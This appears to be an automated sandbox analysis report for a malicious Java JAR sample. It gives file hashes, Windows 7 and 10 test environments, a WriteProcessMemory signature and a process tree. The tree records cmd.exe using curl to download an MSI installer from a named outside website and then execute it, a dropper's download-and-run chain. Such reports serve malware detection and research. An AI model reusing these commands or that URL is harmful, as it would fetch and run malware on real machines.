Analysis
max time kernel: 118s
max time network: 119s
platform: windows7_x64
resource: win7-20240220-en
resource tags: arch:x64 arch:x86 image:win7-20240220-en locale:en-us os:windows7-x64 system
submitted: 25-04-2024 01:46
Static task: static1
Behavioral task: behavioral1
Sample: 2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371.jar
Resource: win7-20240220-en
Behavioral task: behavioral2
Sample: 2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371.jar
Resource: win10v2004-20240226-en
General
Target: 2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371.jar
Size: 47KB
MD5: 7f75fe01e92534899449d5191d586045
SHA1: a26a267dac7dfc8b8feda0a190dc845ad4f6f0ca
SHA256: 2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371
SHA512: 9b240cdb3d6a00821ef03c749807a3eaea5c1b065f7f88f94c5904a64f94d276a31efefb0a301549744f67a42e3dd8389a6a1d057ff1fd09a942b1b3dd5925bf
SSDEEP: 768:s2quUO5gEeRU+aD+QusAXK9wEglRozyt8VomdfeBTcdgknm2+N9Utl:s2RvWayh9owEREmYBgnm2+y
Malware Config
Signatures
Suspicious use of WriteProcessMemory (6 IoCs)
Processes: java.exe
description | pid | process | target process
PID 2080 wrote to memory of 2656 | 2080 | java.exe | cmd.exe
PID 2080 wrote to memory of 2656 | 2080 | java.exe | cmd.exe
PID 2080 wrote to memory of 2656 | 2080 | java.exe | cmd.exe
PID 2080 wrote to memory of 2532 | 2080 | java.exe | cmd.exe
PID 2080 wrote to memory of 2532 | 2080 | java.exe | cmd.exe
PID 2080 wrote to memory of 2532 | 2080 | java.exe | cmd.exe
Processes
C:\Windows\system32\java.exe
  java -jar C:\Users\Admin\AppData\Local\Temp\2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371.jar
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\cmd.exe
    cmd /c curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi
  C:\Windows\system32\cmd.exe
    cmd /c C:\downloads\aHPCrYM1.msi